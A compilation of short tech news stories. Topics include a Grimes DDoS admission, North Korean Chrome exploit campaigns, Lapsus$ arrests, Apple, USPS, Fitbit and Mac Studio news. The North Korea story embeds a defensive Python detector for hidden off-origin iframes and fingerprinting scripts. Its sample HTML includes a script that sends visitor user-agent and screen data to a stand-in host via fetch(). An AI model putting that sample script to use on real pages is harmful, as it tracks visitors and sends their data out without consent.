Grimes claims responsibility for 2012 hack of culture blog Hipster Runoff

Grimes’ connections to hacking extend beyond a Cyberpunk 2077 cameo, apparently. Cybersecurity expert Jackie Singh and Pitchfork report the electropop star (aka Claire Boucher) confessed to hacking the culture blog Hipster Runoff in a Vanity Fair interview. She said she coordinated a distributed denial of service attack against the site in 2012 after its anonymous author Carles posted an allegedly “mean” story including a photo of her kissing a friend at a party.

At the time, Carles told Motherboard there was evidence of “foul play” on the server, including a disk crash and sabotaged backups. Grimes said she and her fellow, still-anonymous perpetrator (from the games industry) “basically blackmail[ed]” Carles into removing the story before they would let him restore Hipster Runoff.

The admission might be more than just an interesting anecdote. As Pitchfork explains, DDoS attacks have long been illegal in both the US and Grimes’ home country of Canada — both nations can sentence culprits to as many as 10 years in prison. Blackmail, of course, has been illegal for longer. Law enforcement could theoretically charge Boucher and her accomplice based on the interview. Current Hipster Runoff owner Trevor McFedries has asked Twitter followers if anyone has a backup of the site under Carles, so the story might not be over yet.

Meghan Markle’s first Spotify podcast series will confront female stereotypes

Meghan Markle hasn’t wasted much time setting expectations for her first Spotify podcast. As The Hollywood Reporter notes, Spotify has revealed that the Duchess of Sussex’s initial series is Archetypes, an exploration of the “labels that try to hold women back.” The teaser indicates Markle will hold “uncensored” discussions with historians and other experts as they explore the origins of the stereotypes that define female lives.

Spotify had already announced that Archewell Audio, the production company founded by Markle and Prince Harry, would release their first full podcast series in the summer. Until now, the duo had only released a one-episode holiday special.

The announcement helps wind down a tense chapter for Spotify. The streaming service landed a deal with Harry and Meghan in December 2020, but the two quickly grew concerned about Spotify’s apparent tolerance of COVID-19 misinformation. The couple said they’d raised issues starting in April 2021, and those worries only became more prominent when Neil Young and other creators started pulling or pausing content in protest of Spotify’s apparent comfort with Joe Rogan allowing false medical claims on his show. Harry and Meghan had a change of heart after they met with Spotify to discuss and shape its anti-misinformation strategy.

This doesn’t end the complaints about Spotify’s approach to bogus claims. Even one of its own podcasts, Science VS, fought the service by fact-checking misinformation from other productions. However, it does give Spotify a chance to focus more on promoting exclusives and less on damage control.

Google says it thwarted North Korean cyberattacks in early 2022

Google’s Threat Analysis Group announced on Thursday that it had discovered a pair of North Korean hacking cadres going by the monikers Operation Dream Job and Operation AppleJeus in February that were leveraging a remote code execution exploit in the Chrome web browser. 

The blackhatters reportedly targeted the US news media, IT, crypto and fintech industries, with evidence of their attacks going back as far as January 4th, 2022, though the Threat Analysis Group notes that organizations outside the US could have been targets as well.

“We suspect that these groups work for the same entity with a shared supply chain, hence the use of the same exploit kit, but each operate with a different mission set and deploy different techniques,” the Google team wrote on Thursday. “It is possible that other North Korean government-backed attackers have access to the same exploit kit.”

Operation Dream Job targeted 250 people across 10 companies with fraudulent job offers from the likes of Disney and Oracle sent from accounts spoofed to look like they came from Indeed or ZipRecruiter. Clicking on the link would launch a hidden iframe that would trigger the exploit. 

Operation AppleJeus, on the other hand, targeted more than 85 users in the cryptocurrency and fintech industries using the same exploit kit. That effort involved “compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors,” Google’s security researchers found. “In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.”

“The kit initially serves some heavily obfuscated javascript used to fingerprint the target system,” the team said. “This script collected all available client information such as the user-agent, resolution, etc. and then sent it back to the exploitation server. If a set of unknown requirements were met, the client would be served a Chrome RCE exploit and some additional javascript. If the RCE was successful, the javascript would request the next stage referenced within the script as ‘SBX,’ a common acronym for Sandbox Escape.”
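The two delivery traits Google describes above, a hidden off-origin iframe injected into a legitimate site and a script that collects client properties (user-agent, resolution) and sends them to a server, can be triaged from a site owner's side. The following is an added example, not code from Google's Threat Analysis Group or from the affected sites: it parses a page's HTML and flags iframes that are hidden yet point at another host, and inline scripts that read several client properties and also make a network call. The sample HTML, the hostnames `fintech.example`, `video.example` and `kit.example`, and the marker lists are all constructed or assumed for illustration. As TAG notes, the real script was heavily obfuscated, so the literal markers used here catch only the unobfuscated form; the iframe check does not depend on that and is the more robust of the two.

```python
# Added example (not TAG's or any site's own code): triage a page's HTML for a
# hidden off-origin iframe and for an inline script that fingerprints the
# visitor and phones home. Sample data and heuristics below are constructed.
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Inline-style patterns that make an iframe effectively invisible.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:width|height)\s*:\s*0(?:px)?(?![\d.])",
    re.I,
)
# Assumed heuristics: client properties a fingerprinting script reads, and
# APIs it could use to send them. Obfuscation defeats literal matching, so
# treat a hit as a reason to look closer, not as a verdict.
FINGERPRINT_MARKERS = ("navigator.userAgent", "screen.width", "screen.height",
                       "navigator.plugins", "navigator.language")
EXFIL_MARKERS = ("XMLHttpRequest", "fetch(", "sendBeacon")


class PageCollector(HTMLParser):
    """Collects iframe attributes and the bodies of inline <script> tags."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag == "iframe":
            # valueless attributes (a bare `hidden`) arrive as None; keep key, blank value
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})
        elif tag == "script" and not dict(attrs).get("src"):
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append("".join(self._buf))
            self._in_script = False


def is_hidden(attrs):
    """True if the iframe is hidden by attribute, by 0/1 px size, or by inline style."""
    if "hidden" in attrs:
        return True
    if attrs.get("width", "").strip() in ("0", "1") or attrs.get("height", "").strip() in ("0", "1"):
        return True
    return bool(HIDDEN_STYLE.search(attrs.get("style", "")))


def find_hidden_offsite_iframes(html, page_url):
    """Return hidden iframes whose src host differs from the page's own host."""
    own_host = urlparse(page_url).hostname
    parser = PageCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname  # None for relative (same-origin) sources
        if host and host != own_host and is_hidden(attrs):
            findings.append({"src": src, "host": host})
    return findings


def find_fingerprinting_scripts(html, min_markers=2):
    """Return inline scripts that read >= min_markers client properties and make a network call."""
    parser = PageCollector()
    parser.feed(html)
    findings = []
    for body in parser.scripts:
        reads = [m for m in FINGERPRINT_MARKERS if m in body]
        sends = [m for m in EXFIL_MARKERS if m in body]
        if len(reads) >= min_markers and sends:
            findings.append({"reads": reads, "sends_via": sends, "snippet": body.strip()[:80]})
    return findings


# Constructed sample: a legitimate page with one injected iframe and one
# fingerprinting script; the other iframes and script are benign controls.
SAMPLE_URL = "https://fintech.example/"
SAMPLE_HTML = """
<html><body>
<h1>Account dashboard</h1>
<iframe src="/widgets/rates" width="300" height="200"></iframe>
<iframe src="https://video.example/embed/123" width="560" height="315"></iframe>
<iframe src="https://kit.example/landing" width="0" height="0" style="display:none"></iframe>
<script>
  var d = { ua: navigator.userAgent, w: screen.width, h: screen.height };
  fetch("https://kit.example/fp", { method: "POST", body: JSON.stringify(d) });
</script>
<script>console.log("analytics stub");</script>
</body></html>
"""

if __name__ == "__main__":
    for f in find_hidden_offsite_iframes(SAMPLE_HTML, SAMPLE_URL):
        print("hidden off-origin iframe ->", f["src"])
    for f in find_fingerprinting_scripts(SAMPLE_HTML):
        print("fingerprinting script reads", f["reads"], "and sends via", f["sends_via"])
```

Run against a saved copy of each public page (or a crawl of your own site) and diff the findings against a known-good baseline; a visible third-party embed such as the video iframe above is deliberately not flagged, since only the combination of hidden and off-origin matches the pattern in the report.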

The Google security group discovered the activity on February 10th and had patched it by February 14th. The company has added all identified websites and domains to its Safe Browsing database as well as notified all of the targeted Gmail and Workspace users about the attempts. 

Apple is reportedly planning an iPhone hardware subscription service

Apple’s iPhones and other devices have become increasingly expensive, and the company may be using alternative sales models to help soften the blow. Bloomberg sources claim Apple is developing a subscription service for the iPhone and other hardware. Akin to the iPhone upgrade program, you’d pay a monthly fee rather than an up-front cost or financed instalments. You’d “likely” manage the subscription through your Apple account.

Full details of what would be included weren’t available as of this writing, but the service would include regular upgrades and launch in either late 2022 or early 2023. Pricing is also unknown. Apple’s current upgrade program requires $35 or more per month to get both yearly iPhone upgrades and continuous AppleCare+ coverage.

Apple has already declined to comment. The company hasn’t been shy about moving toward subscriptions, mind you. Digital services like Apple Music, TV+ and Fitness+ have accounted for a rapidly growing slice of the firm’s revenue, and have helped soften the ups and downs of seasonal sales cycles as well as a relatively stagnant phone market. A broader hardware subscription offering would expand this strategy — Apple could count on a steadier revenue stream, particularly from customers who’d otherwise wait longer to replace their gadgets.

The USPS is doubling its order of next-gen electric mail trucks

Despite previously saying that it would only order 5,000 all-electric models of its next-gen postal truck, today the USPS announced that it’s doubling that figure to just over 10,000. 

Produced by Oshkosh Defense, the NGDV (Next Generation Delivery Vehicle) is slated to become the new workhorse of the USPS, with the first batch of trucks scheduled to hit the road sometime in 2023. And as part of the USPS’ efforts to upgrade its aging fleet, the service placed an initial order of 50,000 vehicles featuring a mix of gas and electric-powered trucks.

However, after learning that only 10 percent of those trucks would be EVs, the EPA and the Biden Administration asked the USPS to reconsider the distribution of its order. So now the USPS has increased the number of new electric postal trucks on order to 10,019 BEVs, which is a significant improvement, but still in the minority compared to gas-powered models.

Postmaster Louis DeJoy says “Today’s order demonstrates, as we have said all along, that the Postal Service is fully committed to the inclusion of electric vehicles as a significant part of our delivery fleet even though the investment will cost more than an internal combustion engine vehicle. That said, as we have also stated repeatedly, we must make fiscally prudent decisions in the needed introduction of a new vehicle fleet. We will continue to look for opportunities to increase the electrification of our delivery fleet in a responsible manner, consistent with our operating strategy, the deployment of appropriate infrastructure, and our financial condition, which we expect to continue to improve as we pursue our plan.”

Upgrades on the NGDV include air conditioning, built-in 360-degree cameras, better braking and traction control, and much improved safety thanks to things like air bags and a new collision avoidance system. That said, with the USPS having over 190,000 trucks currently in service, this initial 50,000 order only represents a fraction of what the service will need to fully modernize its fleet. So while the mix of gas and electric NGDVs might not be ideal right now, there should be room to expand electrification in the future. 

Atari collaborates with Cariuma to create a 50th anniversary sneaker collection

Atari is celebrating its 50th anniversary with some smoking new kicks. The venerated gaming company announced on Thursday that it is collaborating with sustainable footwear maker Cariuma. The collection will feature five designs atop two of Cariuma’s most popular sneaker styles, the Chuck Taylor-esque OCA Low and the Vans-adjacent Catiba Pro.

The Catiba Pros retail for $98 and will come in black and white variants, while the $89 OCA Lows will include a red color scheme in addition to the black and white. Though both prominently feature the Atari logo, the two styles will be discernible from a distance, given that the Lows sport the words “Game On” as opposed to the Pro’s depiction of a pixelated Cariuma logo. The sneakers are constructed from eco-friendly materials including GOTS-certified organic cotton canvas, natural rubber and recycled plastics. What’s more, for every pair purchased, Atari and Cariuma will plant two trees in the Amazon rainforest.

This isn’t the first time that the worlds of fashion and gaming have collided: PlayStation has released branded footwear through Nike, and Adidas has previously paired with Xbox — there was even an Atari speaker hat released not too long ago. The Atari x Cariuma collection is available online at Cariuma.com.

Google seeks FDA approval for Fitbit’s passive heart rate monitoring tech

Following a large-scale virtual health study, Google has submitted Fitbit’s passive heart rate monitoring algorithm for review by the US Food and Drug Administration. 

The study, which went live in May 2020, was open to all US Fitbit users over the age of 22, and it was designed to test how accurately the device could detect atrial fibrillation, or irregular heart rhythm. The system uses photoplethysmography to passively track the blood flow in a user’s wrist and determine if there are any concerning irregularities. Google said its algorithm correctly identified undiagnosed AFib 98 percent of the time in this study, and the company presented its results to the American Heart Association at its most recent meeting.

Fitbit’s Sense smartwatch was approved by the FDA in 2020 for its ability to assess AFib using built-in electrocardiogram technology. This method requires active input from the user, while the PPG system heading to the FDA today runs in the background.

In addition to the Fitbit FDA news, Google is rolling out a few other healthcare-related tools. Google Search in the US will soon show available appointment slots with local doctors and clinics when looking for care, with an emphasis on the CVS MinuteClinic.

“While we’re still in the early stages of rolling this feature out, we’re working with partners, including MinuteClinic at CVS and other scheduling solution providers,” Google chief health officer Dr. Karen DeSalvo said. “We hope to expand features, functionality and our network of partners so we can make it easier for people to get the care they need.”

Google is also rolling out “health source information panels” and “health content shelves” on YouTube videos in Japan, Brazil and India this week, in an effort to highlight credible information from legitimate sources.

London police arrest seven people over Lapsus$ hacks

Authorities are quickly cracking down on the Lapsus$ hacking group that allegedly compromised Microsoft and Okta. BBC News reports City of London Police have arrested seven people aged 16 to 21 over connections to Lapsus$. The police didn’t name the older people facing charges, but said they’d been released “under investigation.”

More details appear to have surfaced around one of the leaders. A 16-year-old Oxford boy known as “Breachbase” or “White” has supposedly made the equivalent of $14 million in Bitcoin up to this point, and was apparently outed after business partners doxxed him following a dispute. Researchers have been following him for almost a year, Bloomberg added. The teen made multiple mistakes that helped researchers trail his activity across online accounts.

Lapsus$ claimed to have obtained 37GB in Microsoft source code for projects like Bing, Cortana and mobile apps. They also tried to compromise Okta’s customer support in January and posted images they said showed the company’s internal systems. Microsoft acknowledged that the hackers had limited access to its network, while Okta indicated there was no hostile action beyond the January incident.

The arrests won’t necessarily put a stop to Lapsus$, since the group is believed to call South America its home. They may chill the organization’s activity and rapidly growing buzz, though. Lapsus$ has quickly garnered attention due to major targets like Microsoft, and its Telegram channel now has 47,000 members — the busts won’t exactly encourage copycat attacks.

iFixit teardown offers a peek inside the Mac Studio

The Mac Studio’s storage isn’t quite as set in stone as you might think, although you’ll want to keep your expectations in check. iFixit has conducted a teardown of Apple’s pro desktop that suggests you can replace the SSD module in limited circumstances. The company managed to swap the drive with one of the same capacity (from another Mac Studio) by using Apple’s Configurator app to perform a DFU restore.

You can’t add a second module in the base model, and it’s unclear if higher capacities will work. However, this does suggest you could revive the Mac Studio with a spare module, if Apple ever makes them available through its self-repair program.

It’s no surprise you can’t replace the RAM, which is built into the M1 Max or Ultra chip. The Mac Studio is easier to access than you might think, though, with Torx screws (albeit a huge number of them) and removable ports. And yes, the cooling system in the Mac Studio is as massive as you’d heard. The fans are larger than on other Macs, iFixit said, and the aluminum heatsink in the base model is six times heavier than the one in the Mac mini.

The teardown led iFixit to give the Mac Studio a 6/10 score for repairability. The non-upgradeable components are the largest concerns, but the repair shop was also concerned about buried fans and the potential for dust build-up. You’re probably not buying this system expecting to treat it like a Mac Pro or many PC towers, but those limitations are worth noting if you intend to maintain the Studio yourself.